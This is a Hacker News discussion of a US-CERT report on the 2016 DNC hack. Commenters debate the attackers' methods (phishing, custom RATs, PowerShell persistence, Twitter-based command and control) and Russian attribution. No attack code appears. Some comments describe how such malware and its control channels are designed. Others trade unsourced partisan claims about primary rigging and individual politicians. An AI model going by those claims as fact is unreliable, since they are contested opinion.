Hacker News new | past | comments | ask | show | jobs | submit login
Technical report on DNC hack [pdf] (us-cert.gov)
456 points by jbegley on Dec 29, 2016 | hide | past | web | favorite | 450 comments

I have looked through the report. The only useful information was brief description of attack methods, everything else looks like a list of general recommendations one can find on the OWASP website.

As I understand from report the main methods used were:

- sendind emails with executable files that victims for some reason executed

- phishing

So, they used script kiddie level tools anyone could use (and they are cheap; you don't have to buy expensive zero-day exploits on a black market). But of course this could be done intentionally so it looks amateur-ish.

This attacks could be easily mitigated. First, OS and applications should not run unknown files from Internet (because some people got used to double click on everything they get in email), second, we should start using physical cryptographic keys instead of passwords. Common people cannot handle passwords, they either make easily guessed passwords or enter them everywhere without thinking. I hate passwords too because they are hard to remember (and please don't suggest that I should download some software and upload my passwords to a "cloud" in NSA-controlled country).

By the way iOS is the only popular operating system I know that doesn't allow to execute files downloaded from web or emails. Apple did it the right way.

The report also contains a pretty useless firewall rule named "PAS TOOL PHP WEB KIT FOUND" that can be used to search malware in PHP files. It is interesting that they have replaced digits in 'base64_decode' function name with regexp as if there were any other similar functions.

That's the real absurdity of this debacle to me.

Many of the whitepapers that I read about the DNC hack listed the attack's "sophistication" as proof that it came from a state actor, yet it was the most routine, simple attack conceivable. No rootkits, no 0 days, just simple phishing and social engineering.

The report just didn't get into that much detail but they did say:

"the code delivers Remote Access Tools (RATs) and evades detection using a range of techniques."

A "range of techniques" includes things like rootkits.

>No rootkits,

The attackers did use stealthy persistence techniques often called 'rootkits".

"the SeaDaddy implant developed in Python and compiled with py2exe and another Powershell backdoor with persistence accomplished via Windows Management Instrumentation (WMI) system,[..] The Powershell backdoor is ingenious in its simplicity and power" [0]

>no 0 days

The same group used six 0-days in 2015. Either they didn't need to use them in this attack or they used them and deleted the evidence. Senit is APT28 see quote below:

"One of the striking characteristics of the Sednit group is its ability to come up with brand-new 0-day vulnerabilities regularly. In 2015, the group exploited no fewer than six 0-day vulnerabilities" [1]

>yet it was the most routine, simple attack conceivable.

The attack involved multiple pieces of custom written software and carefully researched spearfishing, the attackers spent time and effort to hide their tracks, maintain persistence and exfil data without detection. This level of effort and time does not qualify as routine, some intelligence agencies can't even write their own RATs.

[0]: https://www.crowdstrike.com/blog/bears-midst-intrusion-democ...

[1]: http://www.welivesecurity.com/wp-content/uploads/2016/10/ese...

Can't one just buy a RAT?

Also, the WMI think they describe doesn't look like rootkit, more like cron analogue for Windows. I.e. on Unix it would be like installing a command inside crontab. That's not what is usually called a rootkit - a tool that is designed to conceals its presence (and other tools presence) from regular OS tools.

You can buy RATs. The several RATs used in this campaign were never for sale.

For example the RAT named X-Agent was one of several used in the DNC hack. It has never been put up for sale and it was used in previous Russian intelligence operations (for example tracking Ukraine artillery[0]).

>That's not what is usually called a rootkit

It doesn't appear that anyone has reverse engineered the PC version of X-Agent but the android variant (which may be very different from the one used in the DNC hack) does take some steps to hide itself. Granted nothing suggests anything like kernel syscall hooking but those sorts of rootkit techniques are overrated because they leave obvious and detectable patterns of compromise.

[0]: https://blog.trendmicro.com/trendlabs-security-intelligence/...

So essentially someone hacked the DNC, and it's "advanced" because some custom software was written just for this particular target ?

I've written custom software (which was a lot harder to find than some python WMI hooks) for hacking a lot lower profile organisations. I've consulted for organisations that were hacked by Chinese hackers for bitcoin ransom that had custom software written too. I mean, high profile target, more effort can be expected. It does not mean the government is involved (although a lot of hacking groups seem to have government sidelines in China, though it does not appear to be their primary activity. I mean unless the Chinese government is itself into bitcoin ransoming).

But more seriously, if a component of our government that is this central to our democracy can be hacked by sending emails "open this exe", then ... I mean seriously. Sorry to say, but if that works, you deserve what happens. Is this really the level of competency in the people that are currently organising the government ?

Also the main thing this report does is validate that the information leaked to the press is indeed true (I figured as much, I mean why put so much effort into fighting fake news unless the real target information is not fake ?).

So Hillary and the DNC is in fact in the pocket of wall street. She DID use the DNC organisation to sabotage Bernie Sanders. There are in fact foreign donors to Hillary and the DNC that are illegal under rules that Hillary's government department is supposed to enforce ... this report mostly confirms that this is indeed the view that the top of the DNC has.

The sophistication is not evidence of government involvement, the lack of sophistication is not evidence that a government was not involved.

Certainly malware which costs serious resources to develop, like stuxnet, says something about the capabilities of the attacker. Given that at the high end of the resource spectrum it is mostly governments, resources required are suggestive of a government, but resources are not conclusive in and of themselves.

The attribution of the DNC hack to APT28 and APT29 was not based on its sophistication but on the similarity to the methods used, tradecraft fingerprints, and the sharing of C&C servers to past attacks.

Apparently John McAfee disagrees with you:


Watched, didn't hear anything that contradicts what I wrote. Can you be more specific?

The closest I can find is when McAfee says: "If it looks like the Russians it isn't the Russians." I said "It looks like the Russians." These statements don't contradict each other.

We do disagree on attribution, but I haven't discussed that in this thread. He is radically skeptical about ever attributing any state sponsored hacking, although in the same interview he does attribute Stuxnet to the US/Israel and the OPM hack to China.

Let's keep the discussion to the technical aspects of the attack. The democrat vs republican antagonism doesn't belong on hacker news.

Then hacker news doesn't belong in human company.

> Is this really the level of competency in the people that are currently organizing the government ?

  Garrett Graff 
  ... Hillary seems to actually be a very persnickety technology user. She is 
  not very comfortable with most technology, only liked to use a BlackBerry and,
  more specifically, only liked to use a specific type of increasingly older and
  more out-of-date BlackBerry.

  She doesn't know how to use a desktop computer. She--

  Sean Cole 
  Wait, wait, wait. Back up. Back up. She doesn't know how to use a
  desktop computer.

  Garrett Graff 
  Hillary Clinton, the Democratic presidential nominee in 2016,
  does not know how to use a desktop computer, according to multiple sources
  interviewed by the FBI.

  Sean Cole 
  How is that possible?

  Garrett Graff 
  The short answer is, I don't know...


Just to add to this, Crowdstrike is on the DNC's payroll. Any conclusions they provide should either be met with skepticism or discredited to a degree.

The Crowdstrike co-founder and CTO is also a Senior Fellow at a think tank that seems particularly giddy about the new Cold War: http://www.atlanticcouncil.org/about/experts/list/dmitri-alp...

"Many breach announcements this year pointed to a “sophisticated attacker” as a narrative of their issue. This usually is followed up by criticism when an initial means of their compromise is revealed.

Most breaches begin with spear phishing, commodity exploits, a leaked key, or some other obvious or preventable detail. However, this is almost never the “sophisticated” aspect of a breach worth talking about. It’s easy to point at an embarrassing vector and dismiss the rest of an attack. Thus, do not judge an adversary by the vector they’ve chosen.

An adversary may show you what “sophistication” means after advancing from their beachhead."

* https://medium.com/starting-up-security/learning-from-a-year...

Valid point, but I should clarify my original comment: I don't find either aspect of the attack--the entry or the payload--to be particularly sophisticated.

Everything I've read indicates the bulk of work was done by Powershell scripts, along with a backdoor process running in the open. If you told me that the backdoor was a kernel level rootkit or something similar then I could get onboard, but as it stands I don't think the attack's complexity is a solid argument for "Russia did it"

The main arguments might be not technical. The political emails are pretty boring stuff for an outsider so it should be some government or politician bothering to get them.

I also remember that some gmail accounts of people from DNC staff were hacked. Gmail probably has logged what IP addresses were used when logging in with stolen passwords and they could be used as a hint too (though most probably they point to cheap VPS bought by some anonymous person or Tor node, I doubt anyone would use a stolen password from their real IP address).

nobody except complete amateurs is using its own computer to do hacking. there are thousands if not millions of compromized computers in aws cloud and similar hosting services that in turn work as robot-hackers to compromise other sites. it is like a self building hacking network where each cell works to infect other cells. so atack, if it was any atack (as document does not have any evidence that it was one) was unlikely be runnig from a real IP but from a random AWS instance registered by some junior software developer from India who bought it to deploy a pet project that was hacked without him even knowing this weeks ago before the event.

Who else could have forced the DNC to rig the primaries? It's very clear from the collusion between CNN and the Hillary campaign that state level actors were involved.

Please don't spread fake news about primary rigging, even if tongue-in-cheek. Stick to discussing the article.

How is primary rigging fake news? Its very obvious from reading the wiki leaks emails that the DNC was brazenly biased towards Hillary and against Sanders.

Because there's absolutely no evidence that it was rigged? Just because the DNC preferred the lifelong Democrat to the lifelong independent (who could have guessed that?) doesn't mean they couldn't still have operated a fair primary.

The emails show that Sanders was more or less a token opponent kept on a leash and kept in line. Remember also how they cut Sanders out of the DNC voting data. There were no big name Democrats running against Hillary.

They also sucked all the money from the state level campaigns into Hillary's campaign, hurting the entire party when they lost after spending so much money trying to force Hillary through.











What specifically did the DNC do to keep Sanders on a leash? My memory of the primaries is far different, with Sanders suing the DNC over access to NGP VAN (which the DNC had cut off until the Sanders campaign showed they had deleted their copies of Clinton's data), loudly complaining about the DNC following the existing rules at the Nevada Convention (http://www.politifact.com/nevada/statements/2016/may/18/jeff...), and generally loudly making unfounded allegations of rigging. Sanders was clearly unleashed, if not unhinged (though the cranky old progressive personality is what I like about him, in much the same way that libertarians are drawn to cranky old Ron Paul).

> They also sucked all the money from the state level campaigns into Hillary's campaign.

You're misreading the Politico article about the Hillary Victory Fund. In that article, the DNC said it was using the initial money to set up common infrastructure for the state parties to use. The money that was supposed to go to the state parties did eventually go to the state parties as you can see here: https://www.opensecrets.org/jfc/summary.php?id=C00586537. To refresh your memory, the first [FEC maximum contribution amount] donated by an individual to the Hillary Victory Fund would go to her primary campaign, the next [max amount] would go to her general election campaign, the next [max amount] would go to the DNC, and the rest would be distributed among the state parties.

Also, I'm curious: whom would you consider a big name Democrat worthy of challenging Clinton not as a token opponent?

Donna Brazille and DWS were respectively fired from CNN and resigned over the corruption.

Donna Brazille wasn't DNC chair until after the primaries were over, so how would she be an example of the DNC rigging the primaries for Clinton?

Wasserman-Schultz resigned to get out of the spotlight, which she believed would put more attention on Clinton for the general election.

We have the DNC's full email history here. Surely if they rigged the primary for Clinton, there would be at least one email showing it.

Donna Brazille was fired for leaking debate questions to the HRC campaign

> Donna Brazille wasn't DNC chair until after the primaries were over, so how would she be an example of the DNC rigging the primaries for Clinton?

Because she sent the emails to the Hillary Campaign. And then was surprise surprise, appointed to the DNC Chair.

You know instead of the Hillary campaign saying, no no, you shouldn't appoint her, we have evidence that she is corrupt, here's the evidence.

And then after the evidence came to light the DNC was like, oh that's fine.

Once again, how is that evidence of the DNC rigging the primaries for Clinton against Sanders? Do you admit that no such evidence exists?

No I don't, to me the emails and the resignations are both evidence and an admission of guilt, to you it might not be.

I hope that Hillary and the DNC are able to get their day in court so the evidence can be heard by a jury of their peers rather than the court of public opinion.

> To me the emails and the resignations are both evidence and an admission of guilt.

Be specific. Which emails are evidence of guilt? None of the emails I've seen have shown any evidence of the DNC rigging the primaries. Why would the resignations be evidence of guilt if the stated reasons for resignation are just as plausible?

Do you realize how much you sound like a conspiracy theorist?

"Rigging", at least as I read it, doesn't imply cheating - it can just imply that the system is unbalanced or all candidates are not on a level playing field.

For example, if I had to compete against someone in a drawing competition, and one of the judges was the parent of my competitor, and that judge has gone out of his way to train and groom his child for years for this competition, I may lament that the contest is rigged, even if the judge doesn't stuff the ballot box.

Why is there both a judge and a ballot box in your analogy? In the primaries, there were only ballot boxes, and Clinton got almost 30% more ballots from normal people outside of the DNC than Sanders. It was a landslide so large that the media had to construct a horse race story just to try to keep it interesting.

The DNC had "groomed" Clinton insofar as she had run in the primaries before and was familiar with the rules. She didn't receive any special treatment from the DNC during the primaries as far as their emails showed.

Because the judges put their votes in a ballot box. Or because stuffing a ballot box is an idiomatic phrase.

Rigging implies fraud, deception, or dishonesty, not just unbalanced.


See sense 3

1. to manipulate or control usually by deceptive or dishonest means <rig an election>

2. to fix in advance for a desired result <rig the contest>

Editted to add second part of sense 3.

Why did you skip the second part of sense 3, which is "to fix in advance for a desired result"?

I don't see that it adds anything to contradict the idea that rigging is only something "unbalanced" and not connoting deceit. "Fix in advance" is an example of fraud. I have no issue with including it in my comment, and have updated it to do so.

I'm not sure why you would think otherwise, though if you're implying that the example of extra, specialized training you provided above is an example of "fix in advance", I disagree. To "fix in advance" would mean that the outcome is predetermined, such as by bribes. This sense of fix is here:


7b. to influence the actions, outcome, or effect of by improper or illegal methods <the race had been fixed>

If you have some other meaning implied by your comment, please explain. I find I'm a terrible mind reader.

But your facts and reasoning regretfully interrupts the circle jerk of the Bernie bros who are convinced their democratic socialist was on the brink of revolutionizing the American political system and finally delivering us to a Denmarkian utopia.

Never mind the fact that Sanders was treated much more gently by the Clinton campaign than Obama was in '08, the only salient fact is that minority voters should have yielded their preference for a man who has spent 30+ years in Washington and yet has largely failed to build any power base.

I'm confused by the last sentence. Are you suggesting that more minority voters went for Sanders over Clinton in the primaries? I had thought the exact opposite.

It's sarcasm... the paranoid Sanders voters screaming that the election was rigged often 'forget' (find unacceptable/truly are clueless) that minority voters are the 800lb gorilla of the Democratic Party. In 08 they wanted Obama, and that's who it got. In 16 they wanted hrc and that's who it got. They throw around Clinton's pop vote win as if it showed our system is broken, all while genuinely believing she beat Sanders by cheating, conveniently ignoring the fact that she beat him by a larger margin.

I have no doubt that Hillary Clinton would have won the primary regardless of the DNC "meddling" in the primary, but I do feel that they would have a more unified DNC had there not been news of the DNC backing HRC before the primaries had even finished.

What "meddling" did the DNC do in the primary? How were they were backing her before the primaries finished?

> In a May 2016 email chain, the DNC chief financial officer (CFO) Brad Marshall told the DNC chief executive officer, Amy Dacy, that they should have someone from the media ask Sanders if he is an atheist prior to the West Virginia primary.[46][47]

> high-ranking DNC officials discussed the possibility of making Sanders' religion a campaign issue in southern states

Did they do so? If so, thats clear meddling. If not, its shows intent of meddling.

> Paustenbach suggested that a past incident could be used to promote a "narrative for a story, which is that Bernie never had his act together, that his campaign was a mess."

Again, suggestion to do acts of meddling but not clear if they went through with it.

> Wasserman Schultz resigned as DNC chair after the leak, and was replaced by Donna Brazile and the Democratic National Committee issued an apology to Sanders.[52] Speaking on CNN, Sanders responded to the email leak: "...it is an outrage and sad that you would have people in important positions in the DNC trying to undermine my campaign.

Regardless if the intended meddling happed or not, it is clear that even the party itself know that they were in the wrong.

> Did they do it?

They did not bring up Sanders's religion, so there was no meddling there.

> Paustenbach suggested that a past incident could be used to promote a "narrative for a story, which is that Bernie never had his act together, that his campaign was a mess."

This is out of context. Sanders was attacking the DNC in the media for following pre-agreed-upon rules in Nevada. They were discussing how to respond to those frankly ridiculous attacks. http://www.politifact.com/nevada/statements/2016/may/18/jeff...

> Regardless if the intended meddling happed or not, it is clear that even the party itself know that they were in the wrong.

To recap, we have their full email history here, yet we still can't find a single instance of them acting to rig the primaries against Sanders. Wasserman-Schultz resigned to get out of the spotlight, which she believed would put more attention on Clinton for the general election.

I was referring to the emails that showed clear favoritism for Clinton over Sanders. I put meddling in quotations because it wasn't necessarily actual instances, but rather the way the DNC treated one of their candidates that left a sour taste in many Sanders supporters mouths.

That led to a lot of acquaintances of mine that supported Sanders to continue bashing Clinton after the primaries were already over, when it would have been really helpful for the Democratic party to have been unified throughout all of that.

I think that's the exact delusion I'm referring to. I think many Sanders supporters genuinely believe that since they have a clear preference for a candidate, that their preference is the only valid option and other people simply aren't allowed to make their own choice.

Again, I refer to them as delusional because the '16 primary fight was about 1/3 as dirty as the '08 primaries, and somehow Sanders supporters feel being treated gently isn't good enough, what they expected was a clear majority of democratic voters to simply hand over the reins of the Democratic Party. They truly expected politics to revolutionize itself because of Sanders presidential run, and somehow tricks would not be a part of politics instantly and forevermore.

I think my big takeaway regarding the primaries is that most 'progressive' Sanders voters simply wanted to hurt the American establishment, and if they couldn't do it with Bernie they wanted to cry, pick up their ball, and go home.

Biased? Yes, the DNC would obviously prefer a Democrat to an independent. Rigged? There was no evidence of any rigging outside of fake news.

Here you're using a common everyday definition of the verb "rig". Observe that this definition excludes e.g. publicizing a political candidate's banal episodes of tawdriness to the scrutiny of voters, so it's not the definition in wide use in USA news media over the last month or so.

I'm using rig in a broad sense. The DNC didn't publicize banal episodes of tawdriness to the scrutiny of voters. If you're talking about the NGP VAN data access, that hit the news on 12/17/2015 when Michael Briggs (Sanders's communications aide) talked about it to BuzzFeed, and the story blew up on 12/18 when the Sanders campaign filed a lawsuit against the DNC over temporarily shutting down their access to the system until they could show that they had deleted any copies they might have had of the Clinton campaign's data.

That's the point. Rigging an election consists of stuffing ballot boxes or intimidating voters or something like that. Phishing John Podesta is the sort of thing that used to be called "opposition research" (assuming arguendo that the phishing party actually cared who won).

I'm sorry, but I don't see what phishing Podesta has to do with fleitz's claim that the DNC rigged the primaries.

Perhaps you've missed the last month of news media output; congratulations! There has been a great deal of innuendo about hackers rigging our election under V. Putin's direct command. Here's the top of Google News just now when I checked: [0] This fine polemic starts with a lamentation of Podesta's email security, mumbles through some baseless speculation about fake news and voting machine hacks, then admits to that baselessness before winding up to this breezy pronouncement: "The bottom line is that as dangerous as actual attempts to compromise voter outcome are, the perception that voting results are flawed is also capable of delegitimizing the democratic process. If citizens believe the vote has been rigged, then why bother voting at all?"

One might note that this author stops short of saying rather than merely insinuating that "publishing emails" constitutes "rigging an election", but he sure wrote a lot of words in that effort.

[0] http://www.cnbc.com/2016/12/29/russia-election-hack-obama-re...

I haven't missed that at all. It just has absolutely nothing to do with fleitz's claim that the DNC rigged the primaries.

Maybe you are not an American. Do you know what the primaries are?

Does the definition of "rig" change from the primaries to the general?

We were discussing fleitz's claim that the DNC rigged the primaries for Clinton. I assert that they didn't. I'm still not sure what you're claiming or whom you think you are disagreeing with.

Imaginary friends don't have legitimate interests.

>> "An adversary may show you what “sophistication” means after advancing from their beachhead."

Sure, that's obviously true in general, but given the current absence of evidence of "sophistication," there is no reason to assume its presence.

Journalists routinely do that - underline that whatever malfeasance is done, the perpetrator is not a usual random criminal but especially heinous one and thus this story is worth your attention.

With computer crime it's especially obvious because most journalists don't know enough to understand what's hard and what's not, so they take the word of law enforcement, and law enforcement has big motivation to make it sound as bad as possible, since it enhances their significance and their success for catching one. "I've caught a sophisticated hacker" sounds better than "I've found a 13-year old kid that sent someone an email saying 'give me your password' and the poor shmoe was silly enough to do just that".

So there won't be a lot of reports about catching unsophisticated hackers. Usually it's always "highly sophisticated" ones.

OTOH, I think the actual (claimed) proof was using of certain bit.ly account etc. not sophistication per se.

Also, it looks like there were at least 3 attacks on the DNC, and phishing was only involved in one. Maybe the whitepapers talked about the other ones.

This is the spear phishing email that we have every reason to believe got Podesta that happened not long before the dump ends:


This is the stats page for the bit.ly phishing link from that email showing two clicks in the right time frame:


It's not rocket science to dump the emails out of a Gmail account:


But the Podesta leaks aren't the same as the DNC leaks, which Wikileaks has long claimed came from an insider who was upset by their treatment of Bernie. It's also interesting to note that even if the DNC was hacked, that doesn't actually prove where the information given to Wikileaks came from.

Given how careless they are in other regards, I have to think that any insider that wants it can get their data. Just read the PDF on this email to see how Colin Powell & Hillary Clinton treat OPSEC: https://wikileaks.org/clinton-emails/emailid/30324

"When I asked why not they gave me all kinds of nonsense about how they gave out signals that could be read by spies, etc. Same reason they tried to keep mobile phones out of the suite. I had numerous meetings with them. We even opened one up for them to try to explain to me why it was more dangerous than say, a remote control for one of the many tvs in the suite. Or something embedded in my shoe heel. They never satisfied me and NSA/CIA wouldn't back off. So, we just went about our business and stopped asking. I had an ancient version of a PDA and used it. In general, the suite was so sealed that it is hard to get signals in or out wirelessly."

Also, the DNC has long been planning to reach for the Putin angle:

"Best approach is to slaughter Donald for his bromance with Putin, but not go too far betting on Putin re Syria. Brent"


The sophistication cited by CrowdStrike was the actions taken on the DNC servers, not the initial penetration.

Exactly, why burn zero-days when you're targeting a technologically unsophisticated adversary with a huge organizational attack surface?

Sure, HDD firmware hacks are cool, but in terms of R&D time far less efficient if you're willing to spam attempts to get in the front door. And I'd say they chose the appropriate level of sophistication given the success of the penetration.

The DNC isn't exactly an air-gapped Iranian nuclear centrifuge.

Exactly, why burn zero-days when you're targeting a technologically unsophisticated adversary with a huge organizational attack surface?

Then how is this evidence of a 'state-sponsored actor'?

And how did the narrative of this story ever get derailed from what it should have been, which was, "The DNC, and John Podesta in particular who had both his gmail and his Twitter accounts hacked, are incompetent", to "this is Russian interference in a US election"?

That some people are unfamiliar with computer security is not news. I have known a fair number of big-shot executives and politicians, all of whom I'd expect would click on suspicious links in their email (if they read the email) and double-click on attachments.

The news is why that particular person was targeted.

> The news is why that particular person was targeted.

For which no proof is being presented. Lots of stuff about hacking tools, nothing really about identifying hackers. Lots of anonymous high level sources offering vague assurances and excuses for why we can't present info...

I can think of two general possibilities. Either (1) there is a conspiracy to mislead the public or (2) showing the proof would reduce our security in some way. I find the latter explanation more plausible.

this is Russian interference in a US election

Although the media and many in politics are saying this, it's plainly false. There is no serious claim that the Russians interfered in our election.

The claims are that the Russians interfered in a presidential campaign. There's a huge difference between the process of campaigning, versus the election process of casting and counting votes.

Sowing this confusion is useful on at least two levels. Most obviously, it serves to undermine the legitimacy of the incoming President. But it's also useful in setting stage for future debate about campaign finance laws. It's important in that debate to keep separate the ideas of election - which the government must protect to ensure its faithfulness to the voters - versus the idea of campaigning, which the government may never interfere with, which is the primary purpose of the First Amendment.

It requires some serious mental gymnastics to split those hairs.

There are a lot of people who would benefit from the latter conclusion and not a lot of people who would benefit from the former.

> not a lot of people

There are many Republicans.

Republicans as such don't have a lot of motivation to prove DNC incompetence by them being hacked, now that Republicans won the election - that would be much larger claim that DNC is less than competent than being hacked.

Your assertion does not persuade me.


I'd prefer something a bit sturdier than circumstantial evidence if we're going to accuse a nuclear superpower of cyber warfare.

And sometimes defectors drink polonium-210 and die from radiation poisoning.

The world doesn't come with nice "I did it" notes. You make the best decisions you can with the information you have.

Could you elaborate? Once you have a password shouldn't it be as easy as just downloading all the emails? Any email client should have the functionality built in.

edit: seeing some reports they used "sophisticated" SQL injection... okay...I mean for a lay person it seems sophisticated, sure. But for anyone in the industry it's one of the oldest and easiest tricks in the book.

I really suspect news sources are knowingly exaggerating about the sophistication of this "hack" in order to make up-play Russia's role and downplay the DNC's culpability.

You can read about the backdoors they used here:


The summary: One used Powershell modules and Windows Scheduler to run scripts. Another used a combination of Twitter and public sites like Github/Dropbox for command and control.

In my opinion, neither is impressively sophisticated, and a skilled application developer could whip up something similar in a week or two. Using popular sites like Twitter/Dropbox for C&C has been common for years, and you can purchase similar backdoors/RATs for less than $100.

edit: Another interesting point from the link above: the two exploits stole exactly the same info once inside the DNC network. This would obviously be a big no-no for a sophisticated state actor as it doubles your chance of being compromised, but the author explains it away by claiming that Russia's intelligence agencies are disorganized and adversarial.

Your "summary" leaves out the key points. The SeaDaddy, X-Agent, and X-Tunnel tools used in these attacks have only been used by two groups, using the same control servers each time, on European, American, and World Anti-Doping Agency targets that the Russians had strong motive to attack, with some of the attacks being attributed to Russia by multiple other means.

If it turned out that Russia was not behind these attacks, the scale of the bad publicity for Crowdstrike, Fidelis, Palo Alto Networks, etc. would nearly put them out of business. Unlike you, they have skin in the game and don't make these claims lightly.

The problem with relying upon motive and established MO exclusively is that anyone is therefore capable of framing whomever they like.

This is the next generation of warfare, attribution is simply impossible. Even if there existed actual forensic evidence it could not be relied upon.

Reacting to purported attacks at face value will leave you like a 1-layer chess player, potentially acting on behalf of your adversary.

As I said above, the attribution does not rely solely on motive. All private security firms that analyzed the attack have attributed it to Russia, and they would not stake their reputations on such a flimsy argument.

all private security firms ? name one, please

I named three in my first comment above. There are also Mandiant (FireEye) and SecureWorks. Previous attacks with the same malware were attributed to Russia by Threatconnect and Microsoft, who calls the "Fancy Bear" group "Strontium."

> X-Tunnel

That one is more likely to be used by the Chinese: https://www.invincea.com/2016/07/tunnel-of-gov-dnc-hack-and-...

That document is yet another example of laughably poor security analysis.

The Chinese implementation of the XTunnel protocol is in Java (the GitHub project is written in Java, and you can see an embedded JRE in your blog post's link to the Chinese tool in the strings here: https://cynomix.invincea.com/sample/e2101519714f8a4056a9de18...). The FancyBear implementation is not (no embedded JRE here: https://cynomix.invincea.com/sample/f09780ba9eb7f7426f93126b...).

If you want to see how professionals do it, take a look at https://www.eset.com/int/about/newsroom/research/dissection-....

I have personally written that exact tool while learning Python. A RAT using Twitter for C & C. Uses PGP for encryption and verification. The twitter handles for the C & C change based on a hash of Googles lastest Doodle so you can access it without fear of account deletion.

TIL I'm as good as a state level intelligence team.

Hey CIA/NSA we know you are reading this, my contact info is in my profile. Hire me.

Tomorrow: "Cyberhacker admits to Russian hacker tools"

> Yesterday, an Internet cyber hacker using the alias "cmdrfred" claimed on "HackerNews", an elite underground hacker site, that he or she personally built the hacking tools used by Russia to breach the DNC email servers and change the outcome of the recent election.

> "I have personally written that exact tool [it] uses ... encryption ... so you can access [the DNC] without fear."

> "I'm as good as a state level intelligence team."

> cmdrfred went on to taunt American intelligence agencies while admitting that he was aware that elite anti-cyberhacking teams from the NSA and CIA were monitoring his operations.

> The owner of HackerNews Paul Graham -- venture capitalist, flamboyant playboy, and known Russian sympathizer -- could not be reached for comment.

> TIL I'm as good as a state level intelligence team.

Not to totally ignore the pithiness, but I feel like your comment touches on something I see a ton here (and elsewhere): an offhand dismissal of the 'state level' intelligence capacity.

At the end of the day, the systems were exploited. That more sophisticated methods went unused should be a measure of efficiency and not necessarily execution. Why break out the trick play if your opponent can't keep from you running it up the middle?

True. But the absence of sophistication constitutes evidence neither in favor nor against the "State Actor" hypothesis.

Until a Russian name or IP address is provided, the accusations fail to hold water. An incomplete proof is equivalent to "'cause we said so"

If you are targeting a US political entity, using a staging server in Russia probably isn't the worst idea, so unless the IP address directly ties to the Russian government/intelligence services, it's still only weak evidence of Russia's involvement.

Spoofing ips is absurdly easy.

I agree that IP addresses aren't good evidence but it isn't really possible to spoof TCP in practice.


>hat more sophisticated methods went unused should be a measure of efficiency and not necessarily execution. Why break out the trick play if your opponent can't keep from you running it up the middle?

I question how efficient it is to get caught red handed in the cookie jar of the worlds only super power.

Sure Vladimir Putin could invite President Obama to a state dinner and then proceed to blow his head off with an AK-47 but that would lack the subterfuge I expect from "state level actors". If this is indeed the Russians, they are as laughably incompetent as our elected officials in regards to infosec and thus a threat to no one.

Publicly assassinating the president of a country is slightly different then pilfering clumsily guarded emails of campaigning politicians. One starts world wars. The other doesn't.

I'd like to believe that it won't.

RNC got hacked but nothing was leaked.


“We now have high confidence that they hacked the D.N.C. and the R.N.C., and conspicuously released no documents” from the Republican organization, one senior administration official said, referring to the Russians. http://www.nytimes.com/2016/12/09/us/obama-russia-election-h...

The article is very unclear. Here's another quote in the same article that says the hacks against the RNC failed. The NY Times is basically telling us that they received conflicting reports from different anonymous and similarly credible sources.

"One senior government official, who had been briefed on an F.B.I. investigation into the matter, said that while there were attempts to penetrate the Republican committee’s systems, they were not successful."

The "evidence" boils down to:

The Hackers drove a truck.

Russians drive trucks.

The Russians did the hacking.

While its insulting that our government would try to pass off this drivel as "evidence", I'm much more dismayed that so many of my fellow Americans will uncritically accept it as such.

The actual evidence is probably closer to 'we have moles in the kremlin and taps on their phones' but they're not exactly going to publish that are they.

Perhaps. If that's the case, maybe they'll solve the problem using similar cloak-and-dagger methods, like retaliating by arranging to have a Russian government official assassinated or something.

Isn't that kind of obvious to everyone at this point? It's just not out in the explicit open with the right kind of language. By giving such meager evidence of a "certainty", they're essentially giving away that they determined this via other means.

So, right now, let's assume it was a Russian spy agency that hacked the DNC. They're sitting there, thinking, "wow, these FBI folks somehow figured out it was us.". Then after reading this paper, "hmm, that's not a whole lot of evidence, they must have some proof that they're hiding. They must have a mole in our office. Find him, now."

The DNC has to keep their voters mad at an external entity, lest they realize how the DNC sabotaged itself in this election with the "pied piper" strategy to promote Trump, as well as funneling all the money from state-level campaigns into Hillary and making the losses even worse.

Wasn't the NSA spying on the whole Internet or something? Are you telling me the NSA saw no evidence of Russia hacking the DNC servers? They wouldn't necessarily have to reveal their "methods" that it was the Russians if it was the NSA catching them and not some Kremlin CIA spy.

But who knows, maybe they are too busy spying on hundreds of millions of Regular Joes to watch out for all of the Russian attacks.

Haven't the NSA already said they believe it was the Russians? As you suggest, they would be the ones to know.

The NSA doesn't, in general, publicly announce anything. They exist to supply analysis to other branches of government, and only very rarely to the public directly. So the absence of commentary from them in public doesn't indicate that they haven't drawn conclusions and passed them along.

Source? I googled it and only found articles suggested the opposite.


If they're not going to publish their (hypothetical, ostensible, theoretical, possibly entirely imaginary) evidence, then why would we put much faith into their claim? It's not like all major US intelligence agencies haven't led deception campaigns against the public before.

There is a fair amount of public evidence lying around tying the hacks to Russia or at minimum Russians, including CrowdStrike's recent report about Ukrainian artillery. Considering that, it seems more likely that US intelligence has their own evidence, as they claim, than that they're simply making things up (at the risk of substantial embarrassment).

This is not evidence, and it is unlikely evidence would be released. The Administration (as is usually the case for any US executive on any issue unless they are seeking action that requires legislation or a court verdict or something similar by some formal body outside of the executive branch) is not engaging in an effort to prove anything to anyone.

This is an analysis report with information (including most significantly the IOCs in the accompanying files), some of which is previously released and some of which is newly declassified, for use in defending against and forensically identifying attacks by the threat groups identified.

No one is passing this off as evidence of anything.

I think the discussion of sources will be very interesting. There is a strong national interest in restoring faith in our electoral process. This is why so many were appalled at certain accusations that the election was "rigged".

It is more like:

1. Hackers drove a custom built tank that has Moscow factory markings.

2. Similar versions of the tank were used in other campaigns attributed to Russian intelligence.

3. Crew in the tank has been associated with Russian intelligence operations going back ten years.

4. The tank left from a building known to be associated with Russian intelligence hacking campaign.

Thus, the hackers probably take orders from Russian intelligence.

You should mention that the tank with the crew they have inside is publicly available to anybody in the malware archives of APT28/29. Anybody can plant it. Also both the powershell and the py2exe are completely reversible so you can take it, modify it and who's creation is that now? If there is kernel-level stuff then it would be a more solid case but not by much. On top of that, it's entirely possible other completely unrelated attack is responsible for the leaks, but the malware used cleaned up after itself, leaving only the less sophisticated trail behind. Clearly if 2 groups hacked them in the easiest way possible, it's in fact suspicious why haven't they been hacked by other groups. It's almost a certainty others came after it.

>Also both the powershell and the py2exe are completely reversible so you can take it, modify it and who's creation is that now?

What about X-Agent? Seems like it would be harder to modify but I haven't looked into it.

>On top of that, it's entirely possible other completely unrelated attack is responsible for the leaks, but the malware used cleaned up after itself, leaving only the less sophisticated trail behind.

I like this point but it could be brought up in nearly all attributions.

Got a link to the archive?

This report merely points the finger at Russia; it does not purport to substantiate that allegation.

   Previous JARs have not attributed malicious cyber activity to specific 
   countries or threat actors. However, public attribution of these activities 
   to RIS is supported by technical indicators from the U.S. Intelligence 
   Community, DHS, FBI, the private sector, and other entities.
